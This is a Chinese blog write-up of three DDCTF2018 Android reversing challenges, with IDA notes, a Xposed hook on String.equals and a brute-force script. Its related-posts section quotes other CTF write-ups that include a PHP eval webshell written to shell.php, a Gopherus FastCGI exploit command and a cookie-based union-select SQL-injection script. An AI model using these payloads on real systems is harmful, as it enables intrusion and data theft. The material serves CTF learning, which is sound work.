DDCTF2018安卓部分WriteUp

最新推荐文章于 2023-08-16 15:22:37 发布
原创 最新推荐文章于 2023-08-16 15:22:37 发布 · 1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文分享了破解三个安卓挑战题的心得,包括分析程序逻辑、利用IDA解析so文件及采用爆破方法解决问题的过程。

0x0 前言

  感觉自己还是太菜了,还静不下心去学习,可能这就是自己这么菜的原因吧。七天的时间零零散散的做了三个安卓题,简单写一下思路。题目及部分解题脚本https://pan.baidu.com/s/1MpnW_st_VnRRUJx6rHqZOA

0x1 RSA

  刚看到题目还以为程序实现了RSA加密,因此找RSA加密算法找了好久。后来才发现程序经过运算生成一个大数,然后对输入进行取模,如果能整除则正确。

  本题目的JAVA代码比较简单,将输入的字符串传入jni层的stringFromJNI函数,如果stringFromJNI函数的返回值为true则显示Correct.


  将so文件拖入IDA,发现主要处理逻辑为__aeabi_wind_cpp_prj(int a1)函数,因此我们将研究重点放到__aeabi_wind_cpp_prj函数中。

  该函数首先判断输入长度是否为31位,然后将输入的每一位与key的每一位进行异或处理。


  这一块主要是判断输入异或后的结果前十位与十一到二十位、二十一到三十位、三十一位是否相等,所以输入的字符只看前十位即可,后面的与前面的相等。下面又将前十位与后面分隔开,将前十位转成long long 型。

  程序下面做了一系列的运算,最后得到一个大数5889412424631952987

  然后将大数和上面被转成long long的输入做取模运算,判断模是否为0,既5889412424631952987%s==0?这地方有点问题的是ida看到的ulddivmod函数里面的逻辑是返回a1/a2的结果。

  因此我们只需将5889412424631952987做大数分解,求他的两个因子,然后做异或即可。我的脚本写的比较乱,是去爆破输入,只可做参考。

0x2 Hello Baby Dex

 

  程序关于flag的逻辑是相当简单了...可能这就是叫baby dex的原因吧..只是对输入与程序的拼接的字符串做了个equals比较

 

  不过app做了签名的校验与debug的检测,所以如果我们动态调试的话可能会有些麻烦。但是仔细看一下前面flag比较的代码,我们可以发现equals函数是我们的输入调用的,把程序计算好的flag作为参数做对比,所以我们可以使用xposed去hook一下equals函数获取参数来获取flag。

public void handleLoadPackage(XC_LoadPackage.LoadPackageParam loadPackageParam) throws Throwable {
        if (!loadPackageParam.packageName.equals("cn.chaitin.geektan.crackme")){
            return;
        }
        XposedHelpers.findAndHookMethod("java.lang.String", loadPackageParam.classLoader, "equals", Object.class, new XC_MethodHook() {
            @Override
            protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
                if(param.args[0].toString().contains("DDCTF")){
                    XposedBridge.log("before"+param.args[0]);
                }

            }

            @Override
            protected void afterHookedMethod(MethodHookParam param) throws Throwable {

            }
        });
    }
  0x3 Diffie-Hellman

    这个题感觉是在第一题上面改的,java层没有变化,改动了一些jni中的代码,如果看懂了第一题第三题也就没什么问题了。

  大致流程是将你的输入作为2的幂数,与v10进行取模,将得到的模与mod_residual进行比较 既(2^input%v10)==mod_residual ?

  因为我对于密码学没有过深入的了解,所以只能采用了爆破的方法,希望有好办法的大佬能给予指导~

mod_res=0x2BF5B02AC9500
mod=0x1E75BF5AB47900
for i in range(150000,550000):
    if (2**i) %mod==mod_res:
        print(i)
        break
print("stop..")

180522 安卓-DDCTF2018(RSA)
whklhhhh的博客
05-23 799
RSA JAVA层没什么东西,直接将输入送入了Native层的stringFromJNI函数 这个函数垃圾代码极其的多 建议动态调试,跟随输入值来观察计算过程 在主函数中首先用gpower生成了32个字节的i²Table,又GetTicks取了两次时间,然而都没有用上 sub_3133C调用了input,从其中用到的字符串 “basic_string::_S_constr...
180523 安卓-DDCTF(详细复现版)
whklhhhh的博客
05-31 1379
Hello Baby Dex jeb反编译发现不少第三方库,其中一个com.meituan.robust包搜索一下可以发现是美团开发的一个开源热更新框架 参照使用教程可以发现补丁的位置在PatchExecutor类调用的PatchManipulateImp类中的fetchPatchList方法中调用的setLocalPath方法处设置 于是跟着去找 cn.chaitin.geektan.c...
Android逆向writeup,[原创]腾讯apk逆向系列WriteUp
weixin_33236271的博客
05-31 528
0x00 前言正在学习安卓逆向的萌新SR绝赞刷题中,昨天做了三道有意思的题目,感觉很适合入门,于是写了个wp发了出来题目已上传至文章附件,想摸的dalao们可以看看(0x01 APP1工具:JADX,安卓设备/虚拟机安装并打开app,是一个简单的 输入-校验 式app我们用JADX打开apk,看一下反编译代码首先打开xml文件,这里写明了app启动时打开的Activity,确定是MainActiv...
180421 安卓-DDCTF_WP(Android)
whklhhhh的博客
04-21 762
要赶的WP太多了(:з」∠)日后有机会再把更详细的心得和内容补上吧 Android RSA 垃圾代码比较多 动态调试,跟随输入值进入,发现将输入放在了一个结构体中,然后用后八字节作为指针来控制 要求len为31字节 将输入逐字节异或了一个数组以后,遍历结果,要求满足一下关系式: a[i] == a[i+10] 即一个10字节长度的字符串循环3遍 通过校验以后将a[10...
DDCTF2018出题心得
08-24
DDCTF 2018出题心得与题解分享-欧家俊, 什么是好的 CTF
2018DDCTF滴滴高校闯关赛 writeup(难度中等).docx
08-24
2018DDCTF滴滴高校闯关赛 writeup(难度中等)
2018NCTF 部分writeup
qq_42863361的博客
11-27 1204
我才不写WP Our 16bit wars ==Difficulty: Easy== 逆向第一步,学好汇编,16位的也要学 // 64位系统运行需要DosBox ==Author: acdxvfsvd== 读十六位汇编
2019.4 DDCTF web题--滴 writeup
04-14
这篇writeup涉及的是2019年4月的DDCTF(web)竞赛中的第一道题目——滴。这是一道关于Web安全和编码解码的挑战。让我们深入解析这个过程。 首先,URL `...
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup
05-27
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup解析部分题目
DDCTF2019-Writeup
40KO的博客
04-19 5402
目录 WindowsReverse1 WindowsReverse2 confused obfuscating macros 黑盒破解2 北京地铁 MulTzor [PWN] strike Wireshark 联盟决策大会 滴~ Web签到题 Upload-IMG 大吉大利,今晚吃鸡~ Breaking LEM WindowsReverse1 比较基础的一...
2016华山杯ctf安卓题目
06-17
2016年华山杯ctf安卓题目
DDCTF2018(╯°□°)╯︵ ┻━┻writeup
iqiqiya的博客
04-20 2090
  奉上我老哥py脚本 # -*- coding:utf-8 -*- import re import urllib list1=[] list2=[] s = "d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9b2b2e1e2b9b9b7b4e1b4b7e3e4b3b2b2e3e6b4b3...
【jarvisoj刷题之旅】逆向题目DDCTF - Android Easy的writeup
iqiqiya的博客
09-09 1078
下载附件之后   改后缀为.apk 本来是直接载入jd-gui的   结果不好看明白代码 那我们就先放到安卓模拟器运行一下看看    输入123456789 发现Wrong Key   载入Androidkiller 第一步:搜索Wrong 第二步:搜索flag_result_no 第三步:搜索0x7f060023     得到三个好玩的 发现0x7f06...
DDCTF-2018-writeup(5misc)
weixin_30340819的博客
04-20 377
打了好几天最后也只是80多名,我好菜啊.jpg 0x00 (╯°□°)╯︵ ┻━┻ 题目: (╯°□°)╯︵ ┻━┻ d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1e6b3e3b9e4b3b7b7e2b6b1e4b2b6b9e2b1b1b3b3b7e6b3b3b0e3b9b3b5...
ctf apk 总结与回顾
weixin_42100211的博客
08-16 1204
ctf mobile方向的一点点心得。
CTF安卓逆向练习第四弹
熊铁柱的博客
06-13 2421
CTF安卓逆向练习第四弹–反调试技术与JNI_Onload下断点 写在前面的话:继续练习,涉及到新的知识点。题目是阿里2015ctf的第二题,有反调试技术,不能直接的用IDA进行调试,因此这里介绍了两个解题的方法供参考。apk:AliCrackme_2.apk 基本概述与整体思路拿到apk先跑一下,看看我们需要做的事情。 OK,很明确,需要我们输入一个密码,然后点击输入密码按钮,完成破解。
[DDCTF2018]流量分析
qq_48511129的博客
08-29 905
在流量包中搜索 tcp contains “KEY” 追踪tcp流发现 解密后为 接着查看流量包,发现一张png图片。复制 进行解码图片 发现图片是一串字母 ORC在线识别:https://www.onlineocr.net/zh_hant/ 进行图片识别 可能会存在一些错误。自己对照字母看一遍 根据提示套上ssh私钥格式 -----BEGIN RSA PRIVATE KEY----- MIICXAIBAAKBgQDCm6vZmclJrVH1AAyGuCuSSZ8O+mIQiOUQCvN0HYbj815.
Android逆向二—CTF逆向实战(四个方向)
土豆的博客
06-04 4135
Somethingu have to know: 虽然Android平台使用Java来开发应用程序,但Android程序却不是运行在标准的Java虚拟机上,而是将Java字节码转换成Dalvik字节码,并打包到一个DEX可执行文档当中,Dalvik虚拟机通过解析DEX文件来执行这些字节码。 因此我们想了解安卓逆向,就要先了解一下Dalvik的语法。 目录 Somethingu have to know: 0x01 工具准备: 0x02 语法了解: 0x03 练习解...
writeup
最新发布
09-26
以下是部分 CTFHub web 基础教程的 writeup: - **信息泄漏**: ```bash # 安装 dirsearch 包 sudo apt-get install dirsearch # 目录扫描,-u 用于指定要扫描的 URL sudo dirsearch -u "http://challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/" # 进入相关目录 ls cd site ls cd challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/ ls # 扫描程序获取当前 Git 仓库的提交历史信息 git log # 在 Git 中配置一个名为 safe.directory 的全局设置,指定安全目录 git config --global --add safe.directory /home/kali/Desktop/GitHack/site/challenge-74ace4f302db1181.sandbox.ctfhub.com:10800 ls git log ``` - **SSRF 通关攻略之 FastCGI 协议**: ```bash # 在 kali 里下载 gopherus 工具并解压 git clone https://github.com/tarunkant/Gopherus.git # 在文件里打开终端,执行命令 python2 gopherus.py --exploit fastcgi ``` 判断文件是否存在,通过访问不同文件观察返回信息: ```bash # 尝试访问首页文件 访问首页文件 index.php # 访问不存在的文件 输入 wjf.php 显示 404,说明 index.php 存在 ``` 注入木马及编码操作: ```bash # 一句话木马 <?php @eval($_POST['cmd']);?> # base64 编码 PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= # 解码并保存为 shell.php echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php ``` 连接木马: ```bash # 打开蚁剑,右键添加数据,添加木马文件 http://challenge-641b288f17028a60.sandbox.ctfhub.com:10800/wjf123.php ``` - **SQL 注入**: ```python import requests def mySQL(payload): url = 'http://challenge-196392c6b0acebd8.sandbox.ctfhub.com:10800/' header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "Cookie": "id=-1 " + payload + "; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F", } r = requests.get(url, headers=header) return r.text print(mySQL("union select 1,group_concat(schema_name)from information_schema.schemata")) print(mySQL("union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'")) print(mySQL("union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='srdnlrlphq'")) print(mySQL("union select 1,group_concat(icehhmfjxt) from sqli.srdnlrlphq")) ``` - **XSS**:分析完后利用前面的 XSS 网站生成 XSS 攻击代码。注册完进入页面,点击“我的项目”后面的“创建”,选择默认配置,拉到最下面点击“下一步”,将生成的代码拼接到原题目网址后面的 `?name=` 后面,再输入到第二个框内,点击“send”。成功后回到 XSS 网站点击项目内容查看记录[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值